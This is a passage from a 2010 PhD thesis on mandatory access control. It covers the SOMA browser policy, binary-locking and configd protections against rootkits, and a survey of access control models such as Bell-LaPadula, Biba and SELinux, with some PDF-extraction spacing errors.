Ph.d. thesis
Security Mechanisms and Policy for
Mandatory Access Control in
Glenn Daniel Wurster
A thesis submitted to
the Faculty of Graduate Studies and Research
in partial fulfilment of
the requirements for the degree of
DOCTOR OF PHILOSOPHY
Carleton University
Ottawa, Ontario, Canada
2010, Glenn Daniel Wurster
Computer security measures, policies and mechanisms generally fail if they arenot understood and accepted by all parties involved. To be understood, manysecurity mechanisms currently proposed require security expertise by multipleparties, including application developers and end-users. Unfortunately, bothgroups often lack such knowledge, typically using computers for tasks in whichsecurity is viewed at best as a tertiary goal. The challenge, therefore, is todevelop security measures understood and accepted by non-experts.
We pursue measures which require little or no user expertise, to facilitate
broad deployment among non-technical user bases. By reducing the require-ment that end-users self-police applications, we reduce the chance of policy en-forcement errors causing security exposures. The security measures discussedare also straightforward and intended to avoid reliance on security expertiseamong application developers. For example, restrictions imposed by an appli-cation's target run-time environment essentially remove development choices(thus removing dependence on the developer to make proper security choices).
We pursue measures designed to be suitable for deployment to large segmentsof the development community, to reduce the knowledge and adoption barriersthat may otherwise arise. The security measures we propose provide protec-tion by significantly restricting the operations that an application is allowed toperform.
To address issues related to malicious sites and dangerous interactions be-
tween sites, we discuss the joint work SOMA, a browser extension. SOMA en-forces a security policy that limits interaction between web sites to those thatare pre-approved by one or (optionally) both sites involved in any interaction.
SOMA can be incrementally deployed for incremental benefits, and selectivelydeployed to those sites for which tighter control over content sub-syndicationis acceptable. To address rootkits and malware affecting the installation andintegrity of binaries, we present three policies; configd, bin-locking, and in-creased kernel protection. For each approach, we discuss the architecture, im-
plementation and support required. These ideas are suitable for many types ofend-user machines, including those running Linux and Windows. They do notrequire any centralized infrastructure. We discuss approaches which do notdepend on either software developers or users to properly address softwaresecurity.
First and foremost, I want to acknowledge my wife, Heather, for her love andsupport during the process of completing my doctorate. I also want to thankmy parents for their many years of support and parental guidance.
My supervisor, Paul C. van Oorschot was invaluable during the process of
performing both the research as well as writing the resulting papers (and thisthesis). His prompt responses and detailed critiques resulted in a much betterend product. His wealth of security related knowledge and insights were appre-ciated. I'm thankful for his ability to step back, pulling out the core elements ofan idea and helping me express them clearly.
To those who reviewed this thesis, your help was much appreciated. Terri
Oda, Douglas Paul and Heather Wurster, your comments were much appreci-ated and helped make the final product that much better.
Thanks to many of the colleagues in the Carleton Computer Security Lab
who provided feedback during the course of the Ph.D. Their critiques and com-ments helped fine-tune ideas. Conversations with Mohammad Mannan, JulieThorpe, David Whyte, Terri Oda, David Barrera, and Carson Brown helped so-lidify ideas into workable concepts.
For the anonymous conference referees which reviewed the papers submit-
ted to conferences, I wish to thank you for your constructive feedback. Oneof the most important avenues for feedback is through peer reviewed submis-sions – your constructive comments were appreciated. For those on the thesisdefence committee, I likewise thank you for your feedback.
I finally want to acknowledge funding received through a NSERC PGS D
scholarship, as well as funding from NSERC ISSNet and Carleton University.
List of Tables
List of Figures
In current computing environments, applications written by many different au-thors all co-exist, sharing physical resources which include the network andfile-system. Protecting these applications against attacks (both network andfile-system based) while allowing them to share physical resources is not asimple task, especially since some of the applications may be malicious. Thesharing of physical resources between many different applications brings withit many security issues which need to be dealt with. While there are many peo-ple involved with computers on a daily basis, only a small number of them havethe skills required to protect applications against attack. Two groups of individ-uals who have often been tasked with more security responsibilities than theirabilities warrant are users and application developers.
As computers have become more widespread, users of all different skill lev-
els with a variety of skill sets have started buying and interacting with themon a daily basis. The number of application developers has similarly explodedin recent years, with many of them also having different skill levels and spe-cializing in specific areas. Developers can focus on mobile applications, datamining, web page development, game design, image processing or any numberof other areas related to software development. Expecting every developer tobe an expert in computer security is ill-fated. The developer has many goalsand pressures which influence how they choose to spend their time when de-veloping software. With security a tertiary goal (at best), we cannot dependon application developers to develop secure software. We believe that relyingexcessively on either users or application developers for security is ill-advised.
As computers become more accessible to both developers and users, the levelof knowledge which can be assumed has decreased.
The increased accessibility of computers has resulted in a situation where
both users and application developers are using computers while not being fa-miliar with all the details of the system. We believe this is a strength of moderncomputers, one which allows much broader deployment. With this strength,
Chapter 1. Introduction
however, comes a caveat; we can no longer assume in-depth knowledge byeither in properly securing a system. We focus in this thesis on several meth-ods for better protecting applications on a system while not depending on ei-ther group to properly understand, implement, or respond to complex securitymechanisms. We do this by restricting the damage an application can do whenabused or compromised to limit the consequences when security is breached(or, in the case of malware, we restrict the activities it is allowed to perform atall). Our restrictions do not depend on a security-aware user for policy enforce-ment, since the mechanisms we introduce are designed for computers ownedand operated by non-expert users. Our aim is to restrict the damage a maliciousapplication can do (either by design, or when the security of an application iscompromised through a vulnerability); therefore, it is only natural that manyof the protection mechanisms we discuss are designed to prevent applicationsfrom interfering with each other.
Segregation of Applications
The specific protection mechanisms we introduce can be classified based on theenvironment the associated application is designed to run in. In this thesis, weconcentrate on developing protection mechanisms for two such environments,applications designed for desktops and those designed to be deployed as web-sites.
On the Desktop
In current computing environments, applications written by many different au-thors all coexist on disk, being installed at various times. Each applicationnormally includes a number of program binaries and libraries, along with someassociated data and configuration files. While the installation of a new appli-cation will normally not overwrite files previously installed by another appli-cation, permission is commonly granted to modify all binaries (although thisis not generally understood by all end-users). Indeed, this raises a problem:Any application or application installer running with sufficient privileges canmodify any other application on disk. Applications installers are routinely giventhese privileges during software upgrade or install (e.g. almost all installersrun as administrator or root, giving complete access to the system). Someapplications even run with administrator privileges during normal operationdespite the best efforts and countless recommendations against this practice
1.1. Segregation of Applications
over the years. Commonly running applications (including their installers) asadministrator leads to a situation in which a single application can modify anyother application's files on disk. Normally, applications do not use (or abuse)this privilege. Malware, however, does not traditionally respect the customs ofnormal software, and uses the ability to modify other binaries as a convenientinstallation vector. Already in 1986, the Virdem virus was infecting exe-cutables in order to spread itself. More recently, rootkits have used binaryfile modification in an attempt to hide.
One part of this thesis pertains to protecting an application's files on disk.
We discuss two different protection mechanisms: Bin-Locking, which is de-signed to limit modifications to binaries on disk, and configd, which is de-signed to limit modifications by an application to other application's file-systemobjects.
As a Website
Current web pages are more than collections of static information: they area combination of code and data often provided by multiple sources, being as-sembled or run by the browser. The browser itself provides a very powerfulenvironment for communicating with arbitrary web servers and running arbi-trary web-based applications. External content fetched by a browser may beuntrusted, untrustworthy, or even malicious. Such malicious content can initi-ate drive-by downloads misuse a user's credentials or even causedistributed denial-of-service attacks
A common thread in misuse of the functionality provided by a browser is that
the browser must communicate with web servers which would generally not becontacted during the normal execution of the web-based application. Thoseservers may be controlled by an attacker, may be victims, or may be unwittingparticipants. Whatever the case, information should not be flowing betweenthe user's browser and these sites.
A second part of this thesis addresses restricting the exposure of web-based
applications in an effort to reduce the effect of some of the most common web-based attacks. We detail and discuss the Same Origin Mutual Approval (SOMA)approach, which requires the browser to verify that both the site operator ofthe page and the third party content provider approve of the inclusion beforeany communication is allowed (including adding anything to a page).
Chapter 1. Introduction
From the above discussion, the doctrine which motivates our work is summa-rized by the following assumptions:
A1. The current approach of relying on the application developer to properly
implement security policies that protect a system against attack is inap-propriate, given that many developers are not experts in security (andindeed, some developers write malicious applications intentionally). Sim-ilarly, relying on an end-user to police security policies is unwise, giventhat many end-users are not educated in security.
A2. Applications written by different developers co-exist, sharing resources.
While we focus on sharing of the file-system and Internet, the assertionholds true for other physical resources as well.
A3. Applications rely on an environment provided by some external third-
party. In the case of desktop applications, this is the OS vendor. Webapplications similarly rely on both the web server they run on, as well asthe browsers.
A4. Those creating an application environment can be relied upon to properly
implement security mechanisms designed to protect applications operat-ing in the environment from interfering with each other. We do not assumethat those creating the application environment will be able to design newsecurity mechanisms (the contribution of this thesis is in designing newsecurity mechanisms specific to two environments).
Given the above assumptions, we hypothesize that there are approaches
that can be taken for protecting applications that do not require end-users ordevelopers to be security experts, and result in better overall application se-curity. Given that both the system owner and application developer may notbe relied upon to adequately protect applications, can appropriate mandatoryaccess control mechanisms be developed to better protect applications? Ourobjective is to pursue this question, and if possible, design several mechanismsthat result in better overall application security but require little end-user or de-veloper security expertise. In pursuing this thesis, the directions the researchtook involved finding such mechanisms for both desktop applications, as wellas web applications. A second goal of our work is to draw more attention toan under-explored subset of mandatory access control policies, which we callguardian and define in Section
1.3. Main Contributions
In this thesis, we introduce four access control mechanisms, which impose ad-ditional limits on application software. These mechanisms (and the policy theyenforce) are designed to be easy for an application developer to understandand work within. They are also designed to require minimal user involvement.
The specific mechanisms we introduce are:
1.
Limiting Privileged Processor Permission - We consider in Chapter
a policy for restricting the ability to run arbitrary code with privilegedprocessor permission. We pull together pre-existing protection rules andintroduce new protection rules designed to separate root from kernel-levelprivileged processor control on a desktop system. In doing so, we providea basis for positively answering the thesis question. The protection mech-anism resulting from combining the rules does not assume any additionalsecurity knowledge by end-users, satisfying the constraints of our thesisquestion. In separating user from kernel level processor control, we alsoprotect uneducated users from operations that can result in file-systemdata loss. We implement the protection mechanism on a prototype sys-tem, evaluating both its performance and ability to protect against currentrootkit malware.
2.
Bin-Locking - We consider in Chapter the problem of operating system
and application binaries on disk being modified by malware. We presenta new file-system protection mechanism designed to protect the replace-ment and modification of binaries on disk while still allowing authorizedupgrades. We use a combination of digital signatures and kernel modifi-cations to restrict replacement without requiring any centralized publickey infrastructure. Such an approach affirmatively answers the the thesisquestion. To explore the viability of our approach, we implement a pro-totype in Linux, test it against various rootkits, and use it for everydayactivities. The system is capable of protecting against rootkits currentlyavailable while incurring minimal overhead costs. We do not protect con-figuration files, instead focusing on protecting binaries the user does notmodify. Configd addresses the protection of configuration files.
3.
Configd - In Chapter we address the problem of restricting root's abil-
ity to change arbitrary files on disk in order to prevent abuse on mostcurrent desktop operating systems. The approach involves first recogniz-ing and then separating the ability to configure a system from the ability touse the system to perform tasks. The permission to modify configurationof the system is then further subdivided in order to restrict applications
Chapter 1. Introduction
from modifying the file-system objects of other applications. We explorethe division of root's current ability to change arbitrary files on disk anddiscuss a prototype that proves the viability of the approach. The nov-elty in the approach comes from being able to protect, on a desktop usedby non-experts, an applications file-system objects on disk. The approachaffirmatively answers the thesis question.
4. (joint
SOMA - In addition to the main contributions of this thesis,
we also discuss and expand on SOMA. Unrestricted information flows area key security weakness of current web design. The SOMA approach asdiscussed in Chapter fits well with our thesis goal of better protect ap-plications from attack, without relying on expertise on the part of eitherthe system owner or application developer. By requiring site operators tospecify approved external domains for sending or receiving information,and by requiring those external domains to also approve interactions, weprevent page content from being retrieved from malicious servers andsensitive information from being communicated to an attacker. SOMAis compatible with current web applications and is incrementally deploy-able, providing immediate benefits for clients and servers that implementit. SOMA does not depend on the web application developer or browseruser for proper enforcement, satisfying the constraints of the thesis ques-tion.
Many parts and ideas contained in this thesis have been peer-reviewed. Thesepublications are listed below in chronological order.
1. G. Wurster, P. C. van Oorschot. Self-Signed Executables: Restricting Re-
placement of Program Binaries by Malware. In Proc. 2007 Workshop onHot Topics in Security (HotSec), August 2007
• Chapter details the contents of this paper.
2. G. Wurster, P. C. van Oorschot. The Developer is the Enemy. In Proc. 2008
Workshop on New Security Paradigms, September 2008. pp 89-97
1The SOMA work appeared first in a paper published with another Ph.D. student co-
author. The author of the present dissertation contributed the idea of isolating applications.
Terri Oda contributed domain-specific knowledge required to make the approach feasible whenapplied to web applications.
• This workshop paper explored the subject of not trusting developers
to always make proper security choices. While we do not incorporateit in its entirety within the thesis, at a high level the thesis draws onconcepts introduced in this work. In this thesis, we treat the devel-oper as being unable to properly make security related decisions.
3. T. Oda, G. Wurster, P.C. van Oorschot, A. Somayaji. SOMA: Mutual Ap-
proval for Included Content in Web Pages. In Proc. 15th ACM Confer-ence on Computer and Communications Security, October 2008. pp 89-98
• Chapter details and expands on the contents of this paper, which is
4. G. Wurster, P. C. van Oorschot. System Configuration as a Privilege. In
USENIX 2009 Workshop on Hot Topics in Security (HotSec), August 2009
• Chapter details the contents of this paper.
In addition, this thesis presents additional work not yet published in a peerreviewed journal or conference.
1. G. Wurster, P. C. van Oorschot. A Control Point for Reducing Root Abuse
of File-System Privilege. Under submission to conference.
• Chapter details the contents of this paper.
2. G. Wurster, P. C. van Oorschot. Towards Reducing Unauthorized Modi-
fication of Binary Files. Technical Report TR-09-07, Carleton University,September 2009 Under submission for journal publication.
• Chapter and detail the contents of this paper.
In Chapter we provide background on mandatory access control policies,including several which have already been deployed. We concentrate on howeach of the MAC policies is enforced, focusing on the demands placed on boththe user and application developer. In Chapter we discuss SOMA, an ap-proach for better isolation of applications which have been developed for the
Chapter 1. Introduction
web (i.e., the application relies on both a web server and web browser commu-nicating over the same network). Chapter introduces additional enforcementmechanisms which limit any applications ability to gain privileged processorcontrol. Such protections are used in Chapter which introduces an approachfor limiting updates to files based on whether the update can be verified basedon data contained in the already-installed file. Chapter uses the mechanismsdiscussed in chapter and to protect file-system objects belonging to an ap-plication from being modified by other applications on the system. We providea summary of the approaches in Chapter revisiting the thesis hypothesis andquestions.
In this chapter, we provide an overview of access control policies and relatedmechanisms as they relate to this thesis. We start our discussion by examiningthe role of a system administrator in securing the environment they are placedin charge of. We then discuss the various types of access control policies, alongwith how they can be enforced. We also present several access control mecha-nisms that fall into the same category as those presented in this thesis.
A System Administrator Analogy
The job of a system administrator is often conflicting. They must provide sup-port to the users in a particular environment while keeping that environmentsecure. This involves ensuring that all tools users require to get their job doneare available while at the same time not allowing the users to customize theirsystems to the point that they become vulnerable to attack Furthermore,administrators usually prefer to keep the environment identical amongst all ofthe computers they are maintaining to reduce maintenance overhead. The goodsystem administrator will leave the computers in such a state that users do notfeel restricted in how they perform their tasks, but at the same time maintaincontrol over the system in order to combat malware. The job is made harderby the fact that many users are not security experts in-themselves, and conse-quently may do things that undermine the security of the system.
This situation, the continual balance between the goals of the user and goals
of system administrator, can be parallelled in the software development world.
In such an environment, users become the software developers and system ad-ministrators are those that create the environment used by developers. Thiscan either be the software development environment or the run time environ-ment of the developed software. Stray too far toward giving the developers totalcontrol of the systems they are developing for and the security of the system
Chapter 2. Overview
will suffer as a result. Stray too far toward limiting developers, and they willlikely flee from the environment, preferring instead something potentially lesssecure but more usable. Most software developers are not security experts andso, like standard users, may do things that will undermine the security of theresulting system. In reality, both users and software developers are attemptingto get their job done, and security is often not a primary task
If we examine the security mechanisms that have been applied to users ver-
sus those that have been applied to developers, we see a large discrepancy.
While we have been attempting to enforce many security policies on a user(e.g., password strength), many of the security policies have not been enforcedupon developers (e.g., buffer overflow detection), instead being offered as anoption developers can choose to use. Developers, not surprisingly, are unlikelyto choose the security option unless some other external influence also existsto make the choice to change their behaviour/routine more appealing. How dowe increase the security of our system? We convince developers to exchangecurrent unsafe approaches for safer ones.
It is commonly said that we are creatures of habit. We have preferred waysof doing things and breaking a habit can be an arduous task. Individuals alsoprefer to stick with what they know. As a developer, we prefer to use tools,technologies, and approaches with which we are familiar This is espe-cially the case when we are placed under stress (e.g., not having time to learnnew approaches). For this reason, the thesis concentrates on security mecha-nisms that are simple for both the application developer and the end user. Wepursue measures that require little or no user expertise, to facilitate broad de-ployment among non-technical user bases. By reducing the requirement thatend-users self-police applications, we reduce the chance of policy enforcementerrors causing security exposures. By reducing required developer knowledgeand hence adoption barriers, we facilitate use by large segments of the devel-opment community. Approaches either fly or die based on whether they arepicked up by the general community, so making deployment as easy as possibleis critical.
2.3. Access Control Types
Access Control Types
We now discuss necessary background related to security mechanisms and thepolicies they enforce. There are several different types of access control, dif-ferentiated by who is in control of permissions related to the elements beingprotected by an access control mechanism. The taxonomy is illustrated in Fig-ure
Figure 2.1. A taxonomy of types of access control. We build on the generallyaccepted taxonomy of access control by further subdividing the class ofmandatory access controls based on who is responsible for setting policy.
Discretionary Access Control
Under a discretionary access control method, an individual who owns an objectcan either allow or deny access by others to the object. One example of this isthe typical POSIX access controls on Unix, where the owner of a file is allowedto set read, write, and execute access for other members of the group andeveryone else.
Originator Controlled Access Control
Under originator controlled access control, the ability to access an object iscontrolled by the creator of an object A common example of such anapproach is digital rights management in digital media, where the creator at-tempts to retain control over access to the work after it is distributed to thebuyer Bin-locking (Chapter comes close to being such an approach,
Chapter 2. Overview
because the creator is capable of restricting updates based on the selection ofkeys embedded into the file. In reality, however, bin-locking is best thought ofas a hybrid between mandatory and originator controlled access control.
Mandatory Access Control
Under a mandatory access control, access policy for an object is set by an indi-vidual other than the owner or creator of the object. Such a policy is enforcedthrough one or more security mechanisms that exist on the system. The user,even if they own the object, cannot change the mandatory access control policyfor that object. Processes that run for the user cannot modify the policy either.
Typically, policy is set by another individual (or same individual assuming a dif-ferent role). In this thesis, we sub-divide the field of mandatory access controlbased on who is responsible for setting policy.
Policy set by System Owner
In this environment, the mandatory access control policy is controlled by theowner of a system (often the system administrator). If the equipment is part of acompany, then either the IT department or management is typically responsiblefor setting policy. In home environments, the owner and system administratorare typically one and the same. It is assumed that the system administratoris capable of setting the correct mandatory access control policy and properlyimplementing the underlying policy mechanisms required to enforce the policy.
Policy set by System Developer
In this environment, the mandatory access control policy (and deployment ofrelated mechanisms) is set by the developer of the software or hardware. Onereason these policies may be enforced by the developer is to limit damage toeither the hardware or software (e.g., software's ability to control the refreshrate in CRTs is limited to prevent damage due to incorrect refresh rates Other policies may be imposed by the developer to prevent software vulnera-bilities such as buffer overflows (e.g., limiting the size of a string which can beprocessed by the software).
Policy set by a Guardian
While the system administrator or developer in charge of the mandatory accesscontrol policy may have sufficient knowledge to properly set policy, there isalso a chance they will not. This is, in fact, a common criticism against SELinux
2.4. Information Policy Taxonomy
For this reason, we introduce a third category for how mandatory accesscontrol policies can be set: by a guardian. In this enforcement approach, thepolicy is set by someone who is knowledgeable in setting appropriate policy inorder to secure a system (developers and system administrators can be includedin this category as long as they are capable of properly setting the securitypolicy and related enforcement mechanisms). They are designed to protectindividuals who are less aware and to be administered by those who are moreaware of threats inherent in the particular system.
An example of guardian enforced mandatory access control are parental
controls embedded into many media players and video game consoles. Parentalcontrols do not place control of content in the hands of content creators ordevelopers, nor directly into the hands of the system owner (who may be achild in the case of a video game unit). Rather, they are designed to put controlinto the hands of the parents, who are capable of making informed decisionsabout the risks and benefits in a particular environment. Parents are assumedto be sufficiently aware of the dangers of age-inappropriate material to makeinformed decisions about the content to restrict.
SELinux can be shifted to a guardian enforcement approach by having a
central repository of policies maintained by experts which can be drawn fromin protecting a particular system. Recent advancements in SELinux take thisapproach
Information Policy Taxonomy
The various policies for controlling the flow of information are illustrated in Fig-ure Policies generally fall into one of three categories: focusing on theintegrity of information, the secrecy of information, or some combination of thetwo. For those policies focused on integrity, the goal is to prevent modificationswhich reduce the integrity of the information (i.e., modifications which makethe information incorrect or unreliable). For security-based policies, the goalis to prevent the information being disclosed to those not authorized to view it.
Hybrid policies combine aspects of both integrity and secrecy based informa-tion policies. The Chinese wall policy includes elements from both the integrityand and confidentiality policies. It helps prevent against conflict of interest inthe financial world
Chapter 2. Overview
Figure 2.2. A taxonomy of access control policies
Bell-LaPadula Security Model
In the Bell-LaPadula model a set of labels are created that define thesensitivity level of the information associated with that particular label. Thetypical example of such an ordering is 1) unclassified, 2) confidential, 3) secret,and 4) top secret. Any piece of information labelled top secret would be strictlymore sensitive than information labelled confidential. In such a system, eachend-user is also assigned a clearance, indicating what level of information theyare allowed to access. In our example, we consider an individual Heather whois granted secret permission.
Heather is allowed to read all information classified as secret as well as in-
formation classified as both confidential and unclassified (i.e., she can readdown).
Furthermore, Heather is also allowed to write to information with
higher classifications (i.e., she can write up). In allowing Heather to write up,she can communicate information to those who may have higher clearance lev-els, but is prevented from leaking information to those who do not have as higha clearance level. In the Bell-LaPadula system, content assigned to a specificsecurity level can never be leaked to a lower security level.
The simplistic model of read down, write up is not sufficient in protecting
higher level information from being corrupted, because anyone is capable ofmodifying top secret information, even though they will not be able to view it.
For this reason, additional discretionary restrictions are placed on the ability toread and write to content. The Bell-LaPadula Model therefore combines bothdiscretionary and mandatory access control policies.
2.4. Information Policy Taxonomy
Biba Integrity Model
In the Biba integrity model the system is designed to preserve the integrityof objects on the system. Similar to the Bell-LaPadula model, each piece of in-formation is assigned a security level, and principals in the system are assignedclearances. In contrast to Bell-LaPadula, however, the focus is on integrity asopposed to secrecy. In Bell-LaPadula, Heather was allowed to write to contentat a higher secrecy level and read from content at a lower secrecy level. InBiba, Heather would be allowed to do the opposite – read content at a higherintegrity level and only write to content at a lower integrity level. In this way,content with high integrity can only be modified by principals who have per-mission to write to these objects, even though it can be read by everyone. Therestrictions on read are enforced to prevent someone with permission to mod-ify high integrity data from incorporating low integrity data into high integritydata.
The write down aspect of Biba is similar to the POSIX model of root being
able to write to all files on disk and users being only able to read the files.
A difference, however, is that root is also allowed to read all files on disk, anaction not allowed by the Biba integrity model.
As with the Bell-LaPadula model, it is possible to add additional discre-
tionary access control policies on top of the base Biba model to further restrictoperations on the system (e.g., you may not want everyone to be able to read allinformation designated as higher integrity). As long as the mandatory accesscontrols of Biba are not broken, system integrity is assured.
Clark-Wilson Integrity Model
The Clark-Wilson integrity model concentrates on the transactions (or trans-action procedures - TPs) that can be performed on an object. In their model, thesystem state must be consistent before and after each transaction (each trans-action is composed of one or more operations that, if run individually, couldleave the system in an inconsistent state). In this model, the elements thatmust stay consistent are considered constrained data items (CDIs). After theCDIs are verified as initially being consistent by an integrity verification pro-cedure (IVP), one can be guaranteed that any allowable transaction will leavethe CDIs in a state which is also verifiable using the IVP. In order to maintainintegrity, only verified TPs are allowed to run, and each verified TP can only berun by a user with sufficient permission (i.e., each user is specified as having aset of allowable TPs that they can run). Additional requirements are imposedto enforce separation of duty, user authentication, and sufficient logging of ac-
Chapter 2. Overview
Related Access Control Mechanisms
In this section, we discuss several access control mechanisms related to thework in this thesis.
Given that most of the security mechanisms discussed in this thesis are forLinux, we would be remiss if we did not discuss SELinux SELinuxprovides both an enforcement mechanism and an associated specification lan-guage for deploying a mandatory access control policy The specificationlanguage is based on three elements; subjects, objects, and actions. Subjectsare the actors (running processes) on the system. They are allowed to per-form certain actions on specific objects. The enforcement mechanism used inSELinux relies on being able to determine whether the subject is authorizedto perform a specific action on a object based on a table look-up. Such an ap-proach is capable of being used for type enforcement, role based access control(RBAC), multi-level security (MLS) and additional discretionary access control(DAC)
The base NSA SELinux system falls into the category of mandatory access
control policies that are specified by the system administrator. With the intro-duction of policies created by experts and distributed by a central authoritythe implementation switches to a guardian style of access control en-forcement. The complexity of SELinux has greatly limited its deployability todate, resulting in the system being used in very limited contexts and with expertusers The approach of having guardians (instead of end-users) createSELinux security policies has seen broader deployment.
While this thesis introduces new protection mechanisms, SELinux has a
fixed protection policy (an access control matrix) and allows the labelling ofsubjects and objects to vary. The difference is subtle but important. As flexibleas SELinux security policy is, some protection mechanisms discussed in thisthesis are not easily described using the specification language of SELinux, in-cluding SOMA, bin-locking, and configd. SOMA exists in a different applicationenvironment, bin-locking allows the creator of the application binary to allowor deny replacement, and configd applies to installers, which are not likely tohave a SELinux policy present on the system (or if they do have policy, it is very
2.5. Related Access Control Mechanisms
JavaScript Same Origin Policy
The JavaScript same origin policy is designed to limit the ability of JavaScriptto read from and write to content retrieved from a different origin. It is anotherexample of mandatory access control policy being set by a guardian. Policy andmechanism are both set by the browser manufacturers, not web developers orusers. We discuss the JavaScript same origin policy in detail in Section
In contrast to SELinux, the JavaScript same origin policy is simple. Also in
contrast to SELinux, the same origin policy enjoys widespread deployment anduse amongst non-technical users (most of whom don't even know it is in use).
Its relatively simple fixed policy and lack of user involvement in enforcementare some of its greatest strengths.
The Apple Application Marketplace
The procedure for loading an application on many of Apple's devices (includingthe iPod, iPhone, and iPad) currently involves having the application developersubmit their application to Apple for verification before it is made availablefor download from the application market (a similar approach was previouslyused in Symbian phones). Users may only download and install applicationsfrom the market. The Apple application marketplace is another example of amandatory access control policy being set by a guardian, where security deci-sions are made by Apple as opposed to either the developer or the end user.
While most other approaches assume a user with physical possession of thedevice (and sufficient know-how) can ultimately modify the mandatory accesscontrol mechanism, Apple attempts to prevent those in physical possession ofthe device from disabling or otherwise modifying the protection mechanism.
The approach taken by Apple falls into the class of mandatory access control
policy being set by a guardian, similar to those presented in this thesis. In thisthesis, however, we choose not to attempt to protect against physical attacks,leaving open the possibility that the user in physical possession of the device(and sufficient technical know-how) may disable the mandatory access control.
Chapter 2. Overview
Characteristics of Policies Presented
The policies and related security mechanisms discussed in this thesis fall intothe category of mandatory access controls that are set by a guardian (recallFigure on page being controlled in such a way that we hope decisionsare made by those educated and capable of choosing appropriately. In addition,the security mechanisms discussed in this thesis have two additional attributes:
1. They involve little or no user involvement for their enforcement.
2. They have a low adoption barrier for developers who must abide by them
in their software applications.
We further define the guardian set mandatory access control policies dis-
cussed in this thesis by incorporating desirable aspects from parenting – ten-derness and firmness. In rearing good computer users and developers, wefollow the same approach of being tender (by providing an environment whichis constructive rather than adversarial) and being firm about the boundariesthat cannot be crossed (to provide greater protection against security risks).
For users especially, having the policy be set by a guardian helps the user avoidharm even though they may not fully appreciate the risks (similar to how par-ents protect children from unknown dangers). In such a system, applications(and the developers who create them) are likewise not given full trust. Firmlimits which prevent various dangerous activities are imposed in the interestof protecting users, applications, and the environment they run in. In anotheranalogy to parenting, the protection mechanisms should not be overly restric-tive or those affected may rebel.
The security mechanisms discussed in this thesis are designed to be both
applied to individuals less aware of and administered by those more awareof dangers inherent in the particular system: for desktop applications, theseinclude the OS designers, and for web applications, the browser vendors andweb server administrators. Those developing content must abide by the policyset by the guardian (the OS designer, browser vendor, or server administrator)in order to be accepted on the system.
Execute Disable as an Example Mechanism
Execute disable blocks a processor from running binary code from a page inmemory unless the page has been marked as executable in the page table This feature is implemented on most modern processors in an effort to protectagainst code injection buffer overflow attacks The execute disable bit is
2.6. Characteristics of Policies Presented
implemented in hardware, enforced by the processor, activated by the operat-ing system, enforced in all applications, and virtually hidden from users.
The introduction of execute disable as a method for combating code injection
vulnerabilities is also an example of a new mandatory access control mechanismbeing introduced by a guardian into an already established software ecosystem.
It was introduced in the Windows environment with the release of service pack2 for Windows XP While initially the approach was an opt-in one, it is en-abled for all 64bit applications Linux has also introduced execute disablefunctionality. The successful introduction of execute disable gives evidence thatit is possible to add new mandatory access controls into an already deployedsystem (although some introductions require changes to existing apps).
The ability to both execute and write to data on the same page is a feature
that is not commonly used by most developers. Most compilers automaticallystore data on different pages of memory than code. Applications are generallynot negatively affected by the introduction of execute disable (e.g., Arjan van deVen indicated no applications were broken by the enabling of execute disablein Fedora Core 1
The execute disable bit does have its limitations, namely, it is not able to
prevent data from being executed when the data is located on the same pageas code. Also, it is not able to prevent against the modification of data or return-into-libc attacks The simplicity of the approach, however, hasled to its widespread acceptance in spite of the deficiencies. While many othersolutions to the problem of code injection attacks have been proposed (e.g., execute disable continues to be the most popular method because ofits simplicity and broad support.
The introduction of execute disable into modern desktop operating systems
and its enforcement on all applications running on the system are the proper-ties we are seeking for the new access control policies introduced in this thesis.
Execute disable increased the security of the overall system because it waswidely deployed, did not depend on each developer to selectively enable thefeature, and did not depend on the user to understand and administer the pro-tection mechanism. It is therefore a good example of the types of parental styleguardian enforced mandatory access control mechanisms which are discussedin this thesis.
Execute disable does not prevent all buffer overflow attacks that can occur,
but the combination of it with other approaches, such as address space layoutrandomization (ASLR has made exploiting a buffer overflow muchmore difficult for an attacker. ASLR, like the execute disable bit, is controlledby the operating system and enforced on applications.
Chapter 2. Overview
The mechanisms introduced in this thesis are designed to be set by a guardian.
They are designed to be enforced by those designing the environment that ap-plications will run in. They are also designed to be applicable to environmentswhere the user may not be a security expert. As evidence that guardian en-forced mandatory access control mechanisms can be deployed into pre-existingenvironments, we discussed execute disable in Section
Same Origin Mutual Approval
Policy
In this chapter, we present and build on the Same Origin Mutual Approval pol-icy (SOMA), joint work developed to restrict the fetching of web content. Fol-lowing in the style of parental style guardian mandatory access control policies,the approach does not rely on user interaction and imposes additional restric-tions on all developers creating web applications. SOMA is designed to limitthe current promiscuous nature of the Internet, preventing a number of attackvectors which are currently exploited by web malware. We build on the jointwork by providing a comprehensive description of current web attacks, anddiscussing extensions to the core approach.
The current web environment consists of millions of servers distributed through-out the globe serving content to hundreds of millions of users worldwide. Formost users, a web browser is used to fetch various pieces of content and com-bine them together into a web page as viewed by the user. As an example,Figure illustrates a simple base web page. It is comprised of a number ofdifferent objects, including a graphic, text, a style declaration (which affectshow the page is displayed), and JavaScript (not visible). The source is shown inFigure
In loading a web page, the browser will first fetch a base HTML (HyperText
Markup Language) page from a web server. The base page can then refer to ad-ditional files that need to be loaded in order for the page to be fully rendered tothe user by the browser. The web browser will fetch all extra objects referencedby the base page as part of the process of loading the page. In the example codeof Figure this includes fetching an image (line 11), a JavaScript source file
Chapter 3. Same Origin Mutual Approval Policy
Figure 3.1. A sample web page including a graphic.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
<html xmlns="http://www.w3.org/1999/xhtml" xml : lang="en">
<t i t l e >Yes?</ t i t l e >
<l i n k r e l="stylesheet" href='style.css' type="text/css" />
<p>I am an <span class="blink">ugly webpage</span>, yes I am!
<img a l t="" src='face.png' width="400" height="100" /></p>
Figure 3.2. Source code for a sample web page including a graphic.
(line 7), and a style sheet file (line 6). In the example, none of the links includean explicit domain name, hence the objects they point to are fetched from thesame server as the base page. Another possibility, however, is that each linkrefers to a complete URL, allowing objects referenced by the base page to existon servers associated with different origins. For each object loaded by a webbrowser, the origin of that object is defined as the domain name, port number,and protocol through which the element was fetched. JavaScript is currentlythe most popular scripting language
Same Origin Policy
